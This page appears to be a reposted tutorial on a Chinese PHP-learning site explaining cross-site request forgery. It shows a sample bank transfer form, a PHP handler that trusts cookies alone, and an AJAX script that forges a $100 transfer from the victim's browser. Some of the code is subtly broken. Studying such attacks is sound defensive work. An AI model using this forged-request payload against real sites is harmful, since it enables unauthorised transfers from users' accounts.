网站地图    收藏   

主页 > 后端 > 网站安全 >

Cross Site Request Forgery(跨站请求伪造详解) - 网站安

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] With CSRF attack we can to send a fake request from the browser of the user, and thus enter to site with the permission of the user and maintain interact with the s......

With CSRF attack we can to send a fake request from the browser of the user, and thus enter to site with the permission of the user and maintain interact with the site like the script is the user himself.
 
A great example of using on CSRF, is bank site after the user connects to site created cookies on his computer(Role of the cookies is save the data).
From this moment any action performed from the user browser approved by the site system. Here comes in the AJAX technology, with the AJAX we can to send request(packet request) performed by the browser itself.
This means all the cookies and sessions of the user sent with the request(Unlike server-side language) So if there is a form that is used on bank site to money transfer.
We can send POST request to a form using AJAX and the request is approved by the site system, because all the cookies of the user browser sent with the AJAX request
 
Example for CSRF exploit
 
html:
 
Code:
<form action="" method="post" name="transfer">
    Amount of money to transfer:
 
    <label>
        <input type="text" name="money" id="money" />$
    </label>
    <br />
 
    For bank account:
 
    <label>
        <input type="text" name="Baccount" id="Baccount" />
    </label>
    <p>
    <label>
        <input type="submit" name="send" id="send" value="Submit" />
    </label>
    </p>
</form>php:
Code:
<?php
    if(isset($_POST['send'])
    {
        if(is_numeric($_COOKIE['id'] && isset($_COOKIE['password'])
        {
            if(..)
            {
                //if is valid cookies
                //transfer
            }
            else
            {
                //if is invalid cookies
                //blocking
            }
        }
    }
?>
What's the risk here?, as you can see the php script check if it's valid cookies and without additional filtering operation approved the transfer.
This means that if we have the cookies we need only to send fake request to system with the cookies of the user and the system is approved the transfer.
 
AJAX:
Code:
<script type="text/javascript">
 
var http = GetXmlHttpObject();
    
if(http != null)
{
    var url  = ""; //Attacking form address
    var pack = "money=100&Baccount=0123456789&send=Submit";
  
    http.open("POST", url, true);
  
    http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    http.setRequestHeader("Content-length", pack.length);
    http.setRequestHeader("Connection", "close");
  
    http.send(params);
}
  
function GetXmlHttpObject()
{
    if(window.XMLHttpRequest)
    {
        return new XMLHttpRequest();
    }
   
    if(window.ActiveXObject)
    {
        return new ActiveXObject("Microsoft.XMLHTTP");
    }
        return null;
}
  
</script>
 
As already explained, requests sent AJAX are sent from the browser itself so we do not have to worry about to get the cookies of the user.
So even though we sent only the POST in the request sent to the server you'll see something like this:
 
Code:
POST /file.php HTTP/1.1 \r\n
Host: www.2cto.com \r\n
Cookie: id=...; password=..; \r\n
Connection: Close \r\n
Content-Type: application/x-www-form-urlencoded \r\n
Content-Length: .... \r\n\r\n
money=100&Baccount=0123456789&send=Submit
Once returned from the server 200(request was received successfully) transferred $100 from the user account to account number 0123456789.
And so the CSRF attack works, Good bye...

摘自 http://hi.baidu.com/evilrapper/blog/item/9bc74f36ede15c2e0a55a91e.html

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论